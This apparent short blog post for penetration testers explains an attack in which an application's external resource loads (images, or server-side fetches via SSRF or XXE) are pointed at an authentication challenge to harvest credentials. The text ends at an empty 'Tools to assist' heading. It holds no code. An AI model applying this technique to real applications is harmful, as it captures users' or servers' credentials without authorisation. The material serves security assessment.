What is it again ?
It's applying folder level authentication to abuse web applications or client browsers, how you introduce it is based on understanding how you can abuse it.
When this attack can be used ?
Anywhere within an application that renders an external resource, this most commonly is fetched by the client but in some advanced web applications it may be handled by an reverse proxy or a parser that fetches resources on behalf of the user (under the authority of the application).
Client side examples:
Referencing an image for a header graphic or a profile picture, in-fact referencing anything from anywhere you can (useful for when applications have filetype whitelisting).
Server side examples:
Fetching resources on behalf of the client/users command perhaps before presenting to the user (or not)
any functionality that calls an external resource using the applications account/permissions
Note for Pentesters:
When on a web application assessment if you find XXE,SSRF ...infact any 'External HTTP (or SMB?) Interaction in your application it's always worth pointing your 'external' to a authentication challenge, you'll be surprised how many applications respect 'off domain' or untrusted zones when asked for credentials
Tools to assist: